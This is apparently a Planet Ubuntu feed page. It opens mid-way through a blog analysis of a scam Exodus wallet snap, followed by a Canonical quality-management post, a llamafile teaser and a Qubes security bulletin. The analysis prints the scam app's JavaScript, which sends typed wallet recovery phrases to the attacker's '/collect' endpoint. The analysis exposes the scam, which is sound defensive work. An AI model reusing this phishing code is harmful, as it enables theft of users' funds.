</span></span><span style="display: flex;"><span> <span style="color: #f92672;">plugin</span>: <span style="color: #ae81ff;">dump</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">source</span>: <span style="color: #ae81ff;">.</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">organize</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">exodus-bin</span>: <span style="color: #ae81ff;">bin/</span>
</span></span></code></pre></div><p>For completeness, here’s the <code>snap.yaml</code> that gets generated at build-time.</p>
<div class="highlight"><pre tabindex="0"><code class="language-yaml"><span style="display: flex;"><span><span style="color: #f92672;">name</span>: <span style="color: #ae81ff;">exodus-build-96567</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">title</span>: <span style="color: #ae81ff;">Exodus Wallet</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">version</span>: <span style="color: #ae81ff;">8.6.5</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">summary</span>: <span style="color: #ae81ff;">Secure, Manage, and Swap all your favorite assets.</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">description</span>: |<span style="color: #e6db74;">
</span></span></span><span style="display: flex;"><span><span style="color: #e6db74;"> Forget managing a million different wallets and seed phrases.
</span></span></span><span style="display: flex;"><span><span style="color: #e6db74;"> Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">architectures</span>:
</span></span><span style="display: flex;"><span>- <span style="color: #ae81ff;">amd64</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">base</span>: <span style="color: #ae81ff;">core22</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">assumes</span>:
</span></span><span style="display: flex;"><span>- <span style="color: #ae81ff;">command-chain</span>
</span></span><span style="display: flex;"><span>- <span style="color: #ae81ff;">snapd2.43</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">apps</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">exodus-build-96567</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">command</span>: <span style="color: #ae81ff;">bin/exodus-bin</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">plugs</span>:
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">desktop</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">desktop-legacy</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">gsettings</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">opengl</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">wayland</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">x11</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">network</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">unity7</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">network-status</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">command-chain</span>:
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">snap/command-chain/desktop-launch</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">confinement</span>: <span style="color: #ae81ff;">strict</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">grade</span>: <span style="color: #ae81ff;">stable</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">environment</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">SNAP_DESKTOP_RUNTIME</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">GTK_USE_PORTAL</span>: <span style="color: #e6db74;">'1'</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">LD_LIBRARY_PATH</span>: <span style="color: #ae81ff;">${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">PATH</span>: <span style="color: #ae81ff;">$SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">plugs</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">desktop</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">mount-host-font-cache</span>: <span style="color: #66d9ef;">false</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">gtk-3-themes</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">interface</span>: <span style="color: #ae81ff;">content</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">target</span>: <span style="color: #ae81ff;">$SNAP/data-dir/themes</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">default-provider</span>: <span style="color: #ae81ff;">gtk-common-themes</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">icon-themes</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">interface</span>: <span style="color: #ae81ff;">content</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">target</span>: <span style="color: #ae81ff;">$SNAP/data-dir/icons</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">default-provider</span>: <span style="color: #ae81ff;">gtk-common-themes</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">sound-themes</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">interface</span>: <span style="color: #ae81ff;">content</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">target</span>: <span style="color: #ae81ff;">$SNAP/data-dir/sounds</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">default-provider</span>: <span style="color: #ae81ff;">gtk-common-themes</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">gnome-42-2204</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">interface</span>: <span style="color: #ae81ff;">content</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">target</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">default-provider</span>: <span style="color: #ae81ff;">gnome-42-2204</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">hooks</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">configure</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">command-chain</span>:
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">snap/command-chain/hooks-configure-fonts</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">plugs</span>:
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">desktop</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">layout</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">/usr/lib/x86_64-linux-gnu/webkit2gtk-4.1</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">/usr/share/xml/iso-codes</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/share/xml/iso-codes</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">/usr/share/libdrm</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/share/libdrm</span>
</span></span></code></pre></div><h2 id="digging-deeper">Digging Deeper</h2>
<p>Unlike the <a href="https://popey.com/blog/blog/2024/02/exodus-bitcoin-wallet-490k-swindle/">previous</a> scammy application that was written using Flutter, the developers of this one appear to have made a web page in a WebKit GTK wrapper.</p>
<p>If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-3.png"><img alt="No network" src="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-3_50.png" /></a></p>
<p>I brought the network up, ran Wireshark then launched the rogue application again. The app clearly loads the remote content (html, javascript, css, and logos) then renders it inside the wrapper Window.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/wireshark-1.png"><img alt="Wireshark" src="https://popey.com/blog/blog/images/2024-03-18/wireshark-1_50.png" /></a></p>
<p><strong>Edit</strong>: I reported this IP to Hostinger abuse, which they took down on 19th March.</p>
<p>The javascript is pretty simple. It has a dictionary of words which are allowed in a recovery key. Here’s a snippet.</p>
<div class="highlight"><pre tabindex="0"><code class="language-javascript"><span style="display: flex;"><span><span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">words</span> <span style="color: #f92672;">=</span> [<span style="color: #e6db74;">'abandon'</span>, <span style="color: #e6db74;">'ability'</span>, <span style="color: #e6db74;">'able'</span>, <span style="color: #e6db74;">'about'</span>, <span style="color: #e6db74;">'above'</span>, <span style="color: #e6db74;">'absent'</span>, <span style="color: #e6db74;">'absorb'</span>,
</span></span><span style="display: flex;"><span> <span style="color: #960050; background-color: #1e0010;">⋮</span>
</span></span><span style="display: flex;"><span> <span style="color: #e6db74;">'youth'</span>, <span style="color: #e6db74;">'zebra'</span>, <span style="color: #e6db74;">'zero'</span>, <span style="color: #e6db74;">'zone'</span>, <span style="color: #e6db74;">'zoo'</span>];
</span></span></code></pre></div><p>As the user types words, the application checks the list.</p>
<div class="highlight"><pre tabindex="0"><code class="language-javascript"><span style="display: flex;"><span><span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">alreadyAdded</span> <span style="color: #f92672;">=</span> {};
</span></span><span style="display: flex;"><span><span style="color: #66d9ef;">function</span> <span style="color: #a6e22e;">checkWords</span>() {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">button</span> <span style="color: #f92672;">=</span> document.<span style="color: #a6e22e;">getElementById</span>(<span style="color: #e6db74;">"continueButton"</span>);
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">inputString</span> <span style="color: #f92672;">=</span> document.<span style="color: #a6e22e;">getElementById</span>(<span style="color: #e6db74;">"areatext"</span>).<span style="color: #a6e22e;">value</span>;
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">words_list</span> <span style="color: #f92672;">=</span> <span style="color: #a6e22e;">inputString</span>.<span style="color: #a6e22e;">split</span>(<span style="color: #e6db74;">" "</span>);
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">foundWords</span> <span style="color: #f92672;">=</span> <span style="color: #ae81ff;">0</span>;
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">forEach</span>(<span style="color: #66d9ef;">function</span>(<span style="color: #a6e22e;">word</span>) {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #a6e22e;">words</span>.<span style="color: #a6e22e;">includes</span>(<span style="color: #a6e22e;">word</span>)) {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">foundWords</span><span style="color: #f92672;">++</span>;
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span> });
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #a6e22e;">foundWords</span> <span style="color: #f92672;">===</span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">length</span> <span style="color: #f92672;">&&</span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">length</span> <span style="color: #f92672;">===</span> <span style="color: #ae81ff;">12</span> <span style="color: #f92672;">||</span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">length</span> <span style="color: #f92672;">===</span> <span style="color: #ae81ff;">18</span> <span style="color: #f92672;">||</span> <span style="color: #a6e22e;">words_list</span>.<span style="color: #a6e22e;">length</span> <span style="color: #f92672;">===</span> <span style="color: #ae81ff;">24</span>) {
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">button</span>.<span style="color: #a6e22e;">style</span>.<span style="color: #a6e22e;">backgroundColor</span> <span style="color: #f92672;">=</span> <span style="color: #e6db74;">"#511ade"</span>;
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #f92672;">!</span><span style="color: #a6e22e;">alreadyAdded</span>[<span style="color: #a6e22e;">words_list</span>]) {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">sendPostRequest</span>(<span style="color: #a6e22e;">words_list</span>);
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">alreadyAdded</span>[<span style="color: #a6e22e;">words_list</span>] <span style="color: #f92672;">=</span> <span style="color: #66d9ef;">true</span>;
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">button</span>.<span style="color: #a6e22e;">addEventListener</span>(<span style="color: #e6db74;">"click"</span>, <span style="color: #66d9ef;">function</span>() {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">renderErrorImport</span>();
</span></span><span style="display: flex;"><span> });
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">else</span>{
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">button</span>.<span style="color: #a6e22e;">style</span>.<span style="color: #a6e22e;">backgroundColor</span> <span style="color: #f92672;">=</span> <span style="color: #e6db74;">"#533e89"</span>;
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span>}
</span></span></code></pre></div><p>If all the entered words are in the dictionary, it will allow the use of the “Continue” button to send a “POST” request to a <code>/collect</code> endpoint on the server.</p>
<div class="highlight"><pre tabindex="0"><code class="language-javascript"><span style="display: flex;"><span><span style="color: #66d9ef;">function</span> <span style="color: #a6e22e;">sendPostRequest</span>(<span style="color: #a6e22e;">words</span>) {
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">data</span> <span style="color: #f92672;">=</span> {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">name</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'exodus'</span>,
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">data</span><span style="color: #f92672;">:</span> <span style="color: #a6e22e;">words</span>
</span></span><span style="display: flex;"><span> };
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">fetch</span>(<span style="color: #e6db74;">'/collect'</span>, {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">method</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'POST'</span>,
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">headers</span><span style="color: #f92672;">:</span> {
</span></span><span style="display: flex;"><span> <span style="color: #e6db74;">'Content-Type'</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'application/json'</span>
</span></span><span style="display: flex;"><span> },
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">body</span><span style="color: #f92672;">:</span> <span style="color: #a6e22e;">JSON</span>.<span style="color: #a6e22e;">stringify</span>(<span style="color: #a6e22e;">data</span>)
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #a6e22e;">then</span>(<span style="color: #a6e22e;">response</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #f92672;">!</span><span style="color: #a6e22e;">response</span>.<span style="color: #a6e22e;">ok</span>) {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">throw</span> <span style="color: #66d9ef;">new</span> Error(<span style="color: #e6db74;">'Error during the request'</span>);
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">return</span> <span style="color: #a6e22e;">response</span>.<span style="color: #a6e22e;">json</span>();
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #a6e22e;">then</span>(<span style="color: #a6e22e;">data</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">console</span>.<span style="color: #a6e22e;">log</span>(<span style="color: #e6db74;">'Response:'</span>, <span style="color: #a6e22e;">data</span>);
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #66d9ef;">catch</span>(<span style="color: #a6e22e;">error</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">console</span>.<span style="color: #a6e22e;">error</span>(<span style="color: #e6db74;">'There is an error:'</span>, <span style="color: #a6e22e;">error</span>);
</span></span><span style="display: flex;"><span> });
</span></span><span style="display: flex;"><span>}
</span></span></code></pre></div><p>Here you can see in the payload, the words I typed, selected from the dictionary mentioned above.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/wireshark-2.png"><img alt="Wireshark" src="https://popey.com/blog/blog/images/2024-03-18/wireshark-2_50.png" /></a></p>
<p>It also periodically ‘pings’ the <code>/ping</code> endpoint on the server with a simple payload of <code>{" name":"exodus"}</code>. Presumably for network connectivity checking, telemetry or seeing which of the scam wallet applications are in use.</p>
<div class="highlight"><pre tabindex="0"><code class="language-javascript"><span style="display: flex;"><span><span style="color: #66d9ef;">function</span> <span style="color: #a6e22e;">sendPing</span>() {
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">var</span> <span style="color: #a6e22e;">data</span> <span style="color: #f92672;">=</span> {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">name</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'exodus'</span>,
</span></span><span style="display: flex;"><span> };
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">fetch</span>(<span style="color: #e6db74;">'/ping'</span>, {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">method</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'POST'</span>,
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">headers</span><span style="color: #f92672;">:</span> {
</span></span><span style="display: flex;"><span> <span style="color: #e6db74;">'Content-Type'</span><span style="color: #f92672;">:</span> <span style="color: #e6db74;">'application/json'</span>
</span></span><span style="display: flex;"><span> },
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">body</span><span style="color: #f92672;">:</span> <span style="color: #a6e22e;">JSON</span>.<span style="color: #a6e22e;">stringify</span>(<span style="color: #a6e22e;">data</span>)
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #a6e22e;">then</span>(<span style="color: #a6e22e;">response</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">if</span> (<span style="color: #f92672;">!</span><span style="color: #a6e22e;">response</span>.<span style="color: #a6e22e;">ok</span>) {
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">throw</span> <span style="color: #66d9ef;">new</span> Error(<span style="color: #e6db74;">'Error during the request'</span>);
</span></span><span style="display: flex;"><span> }
</span></span><span style="display: flex;"><span> <span style="color: #66d9ef;">return</span> <span style="color: #a6e22e;">response</span>.<span style="color: #a6e22e;">json</span>();
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #a6e22e;">then</span>(<span style="color: #a6e22e;">data</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">console</span>.<span style="color: #a6e22e;">log</span>(<span style="color: #e6db74;">'Response:'</span>, <span style="color: #a6e22e;">data</span>);
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span> })
</span></span><span style="display: flex;"><span> .<span style="color: #66d9ef;">catch</span>(<span style="color: #a6e22e;">error</span> => {
</span></span><span style="display: flex;"><span> <span style="color: #a6e22e;">console</span>.<span style="color: #a6e22e;">error</span>(<span style="color: #e6db74;">'There is an error:'</span>, <span style="color: #a6e22e;">error</span>);
</span></span><span style="display: flex;"><span> });
</span></span><span style="display: flex;"><span>}
</span></span></code></pre></div><p>All of this is done over HTTP, because of course it is. No security needed here!</p>
<h2 id="conclusion">Conclusion</h2>
<p>It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.</p>
<p>I was <strong>somewhat</strong> hopeful that my previous <a href="https://popey.com/blog/blog/2024/02/exodus-bitcoin-wallet-490k-swindle/">post</a> may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.</p>
<p>It would be <strong>really</strong> <em>neat</em> if the team at Canonical responsible for the store could do something to prevent these kinds of apps before they get into the hands of users.</p>
<p>I’ve reported the app to the Snap Store team.</p>
<p>Until next time, Brenda!</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Canonical’s commitment to quality managementhttps://ubuntu.com//blog/canonicals-commitment-to-quality-management2024-03-18T10:10:41+00:00<p>As Canonical approaches its 20th anniversary, we have proven our proficiency in managing a resilient software supply chain. But in the pursuit of excellence, we are always looking to set new standards in software development and embrace cutting-edge quality management practices. This enables us to meet current technological landscape needs. It also paves the way for future innovation, motivating us (as ever) to make open source a key driving force across all industries. In this article I will explore how combining the openness and transparency inherent in open source principles with the right quality management frameworks enables us to lay new foundations for the software-defined industries of tomorrow. </p>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="1600" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_2400,h_1600/https://ubuntu.com/wp-content/uploads/2030/dest.jpg" width="2400" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Open source adoption is growing and with it, regulation</h2>
<p>The presence of open source software components in regulated industries has accelerated dramatically in the past couple of years and can be found everywhere, from the smallest industrial component to the largest ship in the world. Such a broad application domain brings additional complexity and heightened expectations that we address the evolving need for quality requirements. While language-specific standards were ways to address guidelines in a relatively simple world, this is not enough anymore. Instead, we need to adopt quality models that are not just a compliance requirement, but effectively a way to evaluate the produced engineering components. </p>
<p>While these types of models are often developed in the context of regulated domains in specific industries, they can provide insights that are impactful across a broad range of applications. For instance, <a href="https://www.iso.org/standard/78176.html">ISO 25010</a>, a quality model that is the cornerstone of a product quality evaluation system, is a great framework to help engineers understand the strengths and weaknesses of specific artefacts using static code analysis. By using an objective, reproducible and independent quality model that follows ISO 25010 standard, Canonical can meet the expectations of a broad spectrum of industries and enable the opportunities that open source software brings. </p>
<h2 class="wp-block-heading">Adding independent quality indicators</h2>
<p><a href="https://www.tiobe.com/">TIOBE</a> is supporting Canonical in getting an independent overview of its code quality by checking the reliability, security and maintainability of its software sources. The measurements are based on ISO 25010 and follow a strict procedure defined by <a href="https://www.tiobe.com/quality-models/tqi/">TIOBE’s Quality Indicator</a> (TQI). TIOBE provides real-time data integrated in programming environments and separate dashboards and makes use of best-in-class third party code checkers for Canonical.</p>
<p>Paul Jansen, CEO of TIOBE states: “We are thrilled to contribute to the success of Canonical. After having checked the code quality of a lot of Canonical’s projects in our independent and regulated way, it is clear that Canonical is scoring far above the average of the 8,000+ commercial projects we measure every day”.</p>
<p>At Canonical, we believe that Quality Management (QM) is an essential pillar in the development of open source software. That is why we added TQI as one additional control point across our software development lifecycle process. In most industries, the expectations towards innovation but also quality attributes, including the ones highlighted by TIOBE Quality Indicator, are very high. The integration of open source software with industry-recognised quality models marks a paramount step towards achieving excellence and leading to the production of superior software solutions.</p>
<h2 class="wp-block-heading">Addressing quality management requirements in automotive</h2>
<p>A prime example of the advantages of independent quality indicators can be seen in the automotive industry. This sector, with its high demands for safety and technological innovation, presents unique challenges that require impeccable quality and robust software solutions. As vehicles become increasingly software-defined, integrating open source software with industry-recognised quality models becomes not just beneficial but essential. Quality management works as a driving force – not just ensuring the reliability and safety of vehicles – but also the key building block for generating trust in open source within the automotive industry. </p>
<p>As Canonical’s Automotive Sector Lead, Bertrand Boisseau, explains: “The results of the collaboration with TIOBE are crucial, especially in the realm of Software Defined Vehicles (SDVs), where the abstraction and decoupling of software and hardware development cycles is key. The TIOBE TiCS framework supports our R&D efforts related to automotive, enabling us to go beyond the expectations of this demanding ecosystem”. </p>
<h2 class="wp-block-heading">Conclusion</h2>
<p>Our approach is designed to address the inherent complexity of modern software stacks, which are by nature heterogeneous. We make use of quality models like ISO 25010 as accelerators to enhance our quality management processes. At Canonical, these models are instrumental in enriching our continuous improvement practices with measurable data, while also aligning with the expectations of the broader enterprise landscape, particularly when combined with the openness and transparency open source software provides. </p>
<p>If you have embarked on a similar journey to measure quality management in your organisation, I would love to hear about your experience. If you’re eager to join our mission in advancing precision engineering, please explore our openings starting with the <a href="https://canonical.com/careers/4541445">Technical Manager Automotive and Industrial</a> as well as our <a href="https://canonical.com/careers/5103218">Lead Development Lifecycle Engineer</a> positions. Stay tuned to follow our journey towards engineering excellence and connect with me on <a href="https://www.linkedin.com/in/pierreguillemin/">LinkedIn</a>.</p>Ubuntu developershttp://planet.ubuntu.com/llamafile: A Must-Have Tool in the Age of AIhttps://www.deepin.org/?p=333792024-03-18T06:52:55+00:00In the field of AI, the process of configuring and installing environments for model inference is often a headache. If you have such a problem, then llamafile will be a blessing for you. This article was created by deepin community user "传顺页" to give you a first-hand understanding of how to play around with llamafile! What exactly is llamafile? llamafile is an executable Large Language Model (LLM) that can be run on your own computer, and contains the weights for a given open LLM, as well as everything you need to run the model. Surprisingly, you don't need to ...<a href="https://www.deepin.org/en/llamafile-a-must-have-tool/">Read more</a>aidahttps://www.deepin.org/enUpdate for QSB-101: Register File Data Sampling (XSA-452) and Intel Processor Return Predictions Advisory (INTEL-SA-00982)https://www.qubes-os.org/news/2024/03/18/qsb-101-update/2024-03-18T00:00:00+00:00<p><em><strong>Update (2024-03-25):</strong> <a href="https://www.qubes-os.org/feed.xml#marek-marczykowski-g%C3%B3reckis-pgp-signature">Marek Marczykowski-Górecki’s PGP signature</a> is now available.</em></p>
<p>We have updated <a href="https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt">Qubes Security Bulletin (QSB) 101: Register File Data Sampling (XSA-452) and Intel Processor Return Predictions Advisory (INTEL-SA-00982)</a>. The text of this updated QSB (including a changelog) and its accompanying cryptographic signatures are reproduced below, followed by a general explanation of this announcement and authentication instructions.</p>
<h2 id="qubes-security-bulletin-101">Qubes Security Bulletin 101</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
---===[ Qubes Security Bulletin 101 ]===---
2024-03-12
Register File Data Sampling (XSA-452) and
Intel Processor Return Predictions Advisory (INTEL-SA-00982)
Changelog
----------
2024-03-12: Original QSB
2024-03-17: Add information about INTEL-SA-00982
User action
------------
Continue to update normally [1] in order to receive the security updates
described in the "Patching" section below. No other user action is
required in response to this QSB.
Summary
--------
On 2024-03-12, the Xen Project published XSA-452, "x86: Register File
Data Sampling" [3]:
| Intel have disclosed RFDS, Register File Data Sampling, affecting some
| Atom cores.
|
| This came from internal validation work. There is no information
| provided about how an attacker might go about inferring data from the
| register files.
For more information, see Intel's security advisory. [4]
In addition, Intel published INTEL-SA-00982/CVE-2023-38575 [6] on the
same day:
| Non-transparent sharing of return predictor targets between contexts
| in some Intel® Processors may allow an authorized user to potentially
| enable information disclosure via local access.
Information about this vulnerability is very sparse.
Impact
-------
On systems affected by Register File Data Sampling (RFDS), an attacker
might be able to infer the contents of data previously held in floating
point, vector, and/or integer register files on the same core, including
data from a more privileged context.
On systems affected by INTEL-SA-00982, an attacker might be able to leak
information from other security contexts, but the precise impact is
unclear.
Affected systems
-----------------
At present, Register File Data Sampling (RFDS) is known to affect only
certain Atom cores from Intel. Other Intel CPUs and CPUs from other
hardware vendors are not known to be affected. RFDS affects Atom cores
between the Goldmont and Gracemont microarchitectures. This includes
Alder Lake and Raptor Lake hybrid client systems that have a mix of
Gracemont and other types of cores.
At the time of this writing, Intel has not published information about
which systems INTEL-SA-00982 affects. Systems that are still receiving
microcode updates from Intel [7] and that received a microcode update as
part of the microcode release on 2024-03-12 [5] may be affected, even if
they are not affected by RFDS.
Patching
---------
The following packages contain security updates that address the
vulnerabilities described in this bulletin:
For Qubes 4.1, in dom0:
- Xen packages version 4.14.6-7
- microcode_ctl 2.1-57.qubes1
For Qubes 4.2, in dom0:
- Xen packages version 4.17.3-4
- microcode_ctl 2.1-57.qubes1
These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [2] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [1]
Dom0 must be restarted afterward in order for the updates to take
effect.
If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.
Credits
--------
See the original Xen Security Advisory.
References
-----------
[1] https://www.qubes-os.org/doc/how-to-update/
[2] https://www.qubes-os.org/doc/testing/
[3] https://xenbits.xen.org/xsa/advisory-452.html
[4] https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/advisory-guidance/register-file-data-sampling.html
[5] https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/blob/main/releasenote.md#microcode-20240312
[6] https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00982.html
[7] https://www.intel.com/content/www/us/en/support/articles/000022396/processors.html
--
The Qubes Security Team
